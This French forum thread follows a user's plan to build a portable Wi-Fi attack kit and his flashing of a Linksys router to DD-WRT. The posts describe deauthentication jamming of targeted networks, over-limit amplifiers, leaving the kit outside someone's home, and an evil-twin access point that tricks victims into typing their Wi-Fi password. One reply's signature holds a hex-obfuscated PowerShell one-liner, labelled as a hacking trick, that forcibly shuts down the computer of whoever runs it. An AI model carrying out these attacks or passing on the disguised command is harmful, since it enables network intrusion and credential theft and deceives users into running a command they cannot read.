Annonce

Réduire
Aucune annonce.

[WPST] Projet d'un ToolKit Wifi

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • [WPST] Projet d'un ToolKit Wifi

    Bonsoirs à tous je suis à la recherche d'avis par rapport à ce projet que j'ai en tête depuis au moins deux semaine

    Nom de code du projet WPST ( Wireless Portable System Toolkit )

    Concrètement c'est quoi "ce truc "

    Ce truc c'est le projet qui va clôturé l'année 2017 c'est bien plus qu'un toolkit wifi c'est une oeuvre d'art c'est unique en sont genre on ne vera pas deux appareils identique de ce type on me dit souvent que je suis un gros malade dés qu'on parle sans fil avec moi x) alors j'ai décidé de mettre ce projet en service fin décembre 2017 , un projet qui soit à la hauteurs de ma réputation dans le sans fil ( ça m'a valus un surnom .... )

    C'est bien beau tous ça mais c'est quoi qui va rendre ton projet ultra cool et performant ??

    Bonne question très chère ce qui va le rendre si unique en sont genre c'est qu'il va embarque du très lourd niveaux matos six antenne extérieur quatre batteries externe un routeurs linksys 2 amplificateurs wifi une raspberry pi 1 switch trois carte wifi alfa network

    Le choix des carte wifi a été fait en fonction des chipset et de leurs utilité et compatibilité

    - AWUS 036NHA ( Chipset atheros , permet une utilisation Hostapd + Rogue AP
    - AWUS 052NH ( Chipset ralink ) , Dual bande peut être utilisé sur une bande de 5 Ghz et 2.4GHZ
    - AWUS 036NH ( ancien ralink ) , Compatible linux / kali linux + utilisation possible de deux carte wifi en attaque par jamming ( deauthentifications packet voir sollicité les trois carte sur une seuls et même box là la connexion ciblé devra en théorie souffrir )

    Le choix des antennes il faut un système totalement fonctionnelle et le plus étanche possible si jamais on venais à devoir déplacé ça sous la pluie

    - 3x Antenne alfa 9dbi de 27 Cm
    - 3x Antenne alfa 9dbi de 46 Cm

    Seuls différence notable c'est la taille des antennes là encore c'est un choix en effet la longueurs d'onde wifi est de 12, 31 cm
    le but c'est de limité le brouillage de notre propre matériel puisque qu'avec des antenne de taille identique le rayonnement électromagnétique sera identique sans compté qu'il faut prendre en compte le facteur de taille , de puissance de sortis et le réfléchissement ( la wifi sur sa plage de fréquence 2.4Ghz dit haute fréquence à tendance à rebondir sur les objet au lieux de les traversé ( le contraire de la basse fréquence qui quand à cette plage là à tendance à traversé les murs )

    On ne devrais pas parlé de brouillage mais l'utilisation d'amplificateurs combiné à pas mal d'antenne aura tendance à interféré avec le reste pour faire simple les antenne plus haute auront pour rôle de " viré les onde vers le haut " afin de minimalisée les interférences avec les autres appareil connecté ensemble .

    Sauf que : La wifi
    est divisé en 14 canaux, le fait de régler son Wifi sur un canal peu utilisé par le voisinage permet d'avoir une meilleure connexion, actuellement, ce réglage est directement fait par la box au démarrage Donc si on prend en compte ceci la donne change lors d'une attaque sur un réseaux wifi ( jamming par déauthentification packet ) notre carte wifi vire et se calibre sur le même canaux que la box en question pour avoir réalisé des test sur une ancien NB4 d'sfr j'ai été surpris par les effets ce cette attaques des déconnexion intempestif et un débit vraiment minable ça marche donc plutôt bien la question serait maintenant : Si j'utilise 3 carte wifi dont 2 amplifié à 4W sur des équipement relié en réseaux par la wifi , Serait-je en mesure d'interféré avec des caméra wifi et tous ce qui est connecté ? Je vous laisse médité la dessus d'ailleurs à ce sujet là les amplis wifi sont interdite ( 100mw sont autorisé en France ) et le piratage et / ou le gain d'un accès à un réseaux qui n'est pas le sien est passible de prison et d’amende , les amplis vont être utilisé afin de mesure les conséquence de ce type de matériel sur des équipement réseaux m'appartenant , puis elle seront retiré de la black box afin de resté dans la législation

    Ce test à été réalisé avec une AWUS 052NH combiné à airplay-ng ce fut une réussite mais on est très vite limité



    on connais donc la largeur de la malle qui va servir pour le projet L57*l43 on à 6 antenne à répartir dans ce sens là donc on enlève un cm à chaque côtés ce qui donne en théorie : 41 cm on va donc en soit pouvoir espacé chaque antenne d'environ 5.5 cm ( 1.2 cm on été rétiré du au connecteur N femelle qui vont être à mettre en place ) afin de limité encore un peu plus les onde électromagnétique et interférence au sein de cette black box artisanal ( surtout calibré sont routeurs sur un canaux qui n'est pas utilisé ) faire des mesure dans ça ville permet d'avoir une idée des canaux les plus utilisé vers chez soit et ainsi minimalisé le risque d'interférence avec le routeur par exemple vers chez moi , ( je n'ai pas vus une box internet calibré sur le canaux n°13 ou 14 ... )

    Le routeurs est une pièce central de ce projet ( il faudra le flashé et installé DD WRT c'est aussi pour ça que je l'ai choisis) sans lui autant dire que cette black box perdra sont intérêt le but c'est simple : une malle étanche tous le reste raccordé à des hub usb batteries switch raspberry le but sera de paramétrés une connexion SSH sur la Pi admettons dans ce cas de figure :

    On va chez quelqu'un on laisse le matos dans la voiture on prend notre pc portable on se connecte au routeurs , une fois connecté on se connecte en SSH sur la PI3 afin de profité des carte wifi et de tous l'attirail et l'armé de paquet qu'embarque kali à distance le WPST pourra être laissé en extérieur en cas d'intempérie ( boite étanche et si tout est bien fait aucune infiltration ne sera possible j'ai oublié de précisé que si j'ai choisis les N femelle c'est parce que l'adapteur RP-SMA ---------> N femelle est fournis avec un joint d'étanchéité à visé au bout du connecteur femelle c'est donc naturellement un choix de première Hors secteur j'ai évalué la consommation à environ 25W en cas de pic ( ce que j'appelle pic c'est l'utilisation de la pi et de tous , à fond les ballons ) de ce fait environ 4 batterie externe seront nécessaire afin d'alimenté pendant environ 2h - 2h30 l'ensemble du système

    En claire avec la batteries de carte wifi + routeurs les possibilité sont nombreuse et varié de plus des possibilité d'upgrade sont à prendre en considération ( ajout d'un panneaux solaire afin de prolongé encore l'été la duré de fonctionnement , percer un troue sur le devant et ajouté une caméra connecté au routeur antenne plus puissante etc....

    Que pensez vous de ce projet ? à faire absolument ou à vite oublié ? top ou flop ? merci d'avance à ceux qui auront pris la peine de me lire si vous avez des remarque ou des critique ça serait avec plaisir

    Amicalement



    Dernière modification par WirelessWave, 05 novembre 2017, 23h33.

  • #2
    Re bonjours tous le monde , j'ai commencé le projet j'ai reçus une partie du matos , je vous propose donc de commencé par le flashage du routeurs linksys à peine déballé
    je tiendrais ce billet à jours au fur et à mesure de l'avancé du projet , bref voici la petite bête que je vient de recevoir



    Voici la bête dans sont cartons notons que le cartons interne fait vaguement pensez à celui qui sert à conditions les œufs ...
    J'aurais aimé un cartons qui soit un peut plus rigide et de meilleurs qualité

    Malgré ça le routeurs est arrivé entier et heureusement d'ailleurs
    il est aussi livré avec des notices et un cd de driver je crois pour Windows

    Il est de taille modeste sans être trop encombrant ni trop petit juste ce qu'il faut pas de surplus inutile
    même en 2017 il est toujours pleinement fonctionnelle

    Une vue de l'arrière le port rj45 que l'on distingue à peine c'est le port internet les quatre autre font office de switch comme
    dans toute box conventionnel d'ailleurs le boutons à côtés c'est celui permettant de reset le routeurs les port d'antenne sont
    propriétaire aucun routeurs , sauf ceux de cisco & linksys utilise des RP TNC juste histoire de faire payé 100 $ les quatre antenne

    Des antennes modeste à changer dans un futurs proche en mettant un adaptateurs RP TNC vers du RP SMA et collé des
    meilleurs antenne de gain plus fort

    Pour couronner ce petite déballage le bloc d'alimentation et le câble UTP en CAT 5.e
    sans doute à changé également car ce genre de câble en utp ne protège pas très bien des perturbations
    électromagnétique et n'est pas blindé
    en comparaison avec une carte 052Nh et une Pi3

    Conclusion :

    Ensemble correct même en 2017 même si certain point son t à revoir et quelle que modification sont à prévoir notamment sur les antennes
    le câble d'origine

    Procédure de flash d'un routeurs


    Déjà il faut gardé à l'esprit que flashé un routeurs comporte des risques ( brickage , et le routeurs peut devenir inutilisable )
    Je ne pourrais pas être tenus responsable d'éventuelle dommage sur votre matériels
    de plus en flashant votre routeurs vous pourrez augmenté la puissance d'émissions à 254Mw
    la lois vous limite à 100mw .




    Voici l'interface d'origine ante flashage puis il faut ce rendre sur le site DD WRT et chercher le modèle du routeur , puis il faut téléchargé le fichier propre à votre modèle


    Lancé l'upgrade


    Si la procédure de flash c'est bien roulé :
    Néanmoins certaine configuration post upgrade seront nécessaire après ça libre à vous de configuré votre routeurs comme bon vous le semble pour le projet c'est un AP qui va me permettre de connecté une pi et d'y accédé en SSH




    Bon voilà j’espère que ça vous aura plus C'est un très bon routeurs dans l'ensemble

    Commentaire


    • #3
      Alors, bravo pour l'idée, et surtout pour le DIY.

      Par contre pour le coté unique et tout ça : Ya ça qui existe depuis quelques années : https://hakshop.com/products/wifi-pi...nt=11303862021

      Bonne continuation, toujours sympa de faire les trucs sois même
      Hack like a pro :
      PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

      Commentaire


      • #4
        Bonjours merci de ta réponse et de ton avis , oui je connaissait le pineapple mais je trouve ces appareilles assez chère et n'offre pas de fonctionnalité assez poussez , en parcourant les différent forum à l'époque ça permet juste de faire un spot wifi et une Man in the middle à l'ancienne quoi alors que la black box quand à elle est plus souple et bien riche puisque que l'usage de MSF reaver aircrack / aireplay et possible avec la 036NHA ça l'est encore plus on peut carrément crée un fake AP Wifi combiné à aireplay / mdk3 brouiller un réseaux wifi ciblé et faire apparaître notre AP en premier , la personne va rentré sont pass et n'y vera que du feu , je vais faire une simulation cette aprèm avec une carte wifi la Pi et le routeurs je reposterais le résultat en éditant ce poste

        Commentaire


        • #5
          Envoyé par Krisscool Voir le message
          Alors, bravo pour l'idée, et surtout pour le DIY.

          Par contre pour le coté unique et tout ça : Ya ça qui existe depuis meilleurs credits travaux quelques années :

          Bonne continuation, toujours sympa de faire les trucs sois même
          Apres une intrusion n'oubliez pas de submit les flags récoltés

          Commentaire

          Chargement...
          X